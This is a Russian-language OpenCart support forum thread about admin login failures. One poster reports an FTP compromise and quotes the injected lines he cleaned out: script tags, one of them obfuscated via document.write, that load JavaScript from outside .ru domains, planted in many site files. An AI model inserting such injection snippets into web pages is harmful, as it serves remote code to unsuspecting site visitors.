Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Не могу войти в Администраторскую панель


eastvlad

Recommended Posts

Проблема в последней версии

Сижу только в Опере, с трех разных компьютеров, ни с одной версией ОпенКарта подобных проблем не было. Может быть: почистить кэш, куки, обновить jQuery?
Надіслати
Поділитися на інших сайтах


  • 3 weeks later...

Ну вот и я допрыгался.

Никаких настроек сайта не трогал. Но сегодня обнаружил что в админку зайти не могу. Ввожу логин, пароль нажимаю кнопку "войти" а она тупо не жмется... 1.4.7 опенкарт а захожу мозиллкой 3.6.8 и IE6 и там и там одна проблема... Че за глюк может быть? Кэш, куки вроде чистил нифига не помогает :) Пробовал заходить с разных компов - результат тот же. Кнопка "Войти" не жмется и все тут. Спасайте!

Еще заметил неприятность. Хакнули магазин по фтп похоже.

В шести файлах было прибавление вида

<script type="text/javascript" src="http://countryme.ru/Page_Orientation.js"></script><!--6788de35a9235dc2bb436052ec85bf5d-->

Как раз вчерашняя дата стоит по изменению данных фалов в свойствах.

Поменял пароли. Почистил эти шесть файлов, перезалил.. но в админку по прежнему зайти не могу.

Перезалил эти файлы из бэкапа прежнего... результата ноль... зайти в админку до сих пор не получилось.

Еще нашел добавления вида:

document.write('<sc'+'ript type="text/javascript" src="http://starvingarctic.ru/Page_Orientation.js"></scri'+'pt>');
В 278 файлах с расширением .js в папке adminviewjavascript

Перезалил из бэкапа эти файлы.. И ВСЕ ЗАРАБОТАЛО...

А вроде бы и не пускал ни кого за комп, не запускал никаких подозрительных файлов, не читал письма с непонятных адресов... всегда внимателен.. антивирусников куча на компе ан нет.. пробились гады...

Надіслати
Поділитися на інших сайтах


  • 6 years later...

Со вчерашнего дня не могу зайти в административную панель своего сайта mihalich-td.ru. Нажимаю: забыли пароль , ввожу свой email, но письмо не приходит на почту  с запросом подтверждения. Пробовал несколько раз с различных браузеров и компьютеров. Проблема не решается. Написал в тех поддержку пол дня прошло : молчат. Что делать? Началось после того как переносил таблицы базы. До этого все работало. В таблице user проверил пользователя и пароль - ввожу все верно. Стоит последняя версия ocstore.  Самое интересное, что не приходит письмо на почту  с запросом подтверждения. Это уже совсем странно. Работа стала не могу заниматься. Тех поддержка молчит может на форуме кто отзовется

Надіслати
Поділитися на інших сайтах


  • 2 months later...

Помогите пожалуйста не мог установить модули поставил QuickFix OC2.2.0.0 и теперь не могу войти в админку версии OpenCart 2.3.0.2 у же не знаю что делать пишет при входе неправильный логин или пароль!

 

Надіслати
Поділитися на інших сайтах


Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку

×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.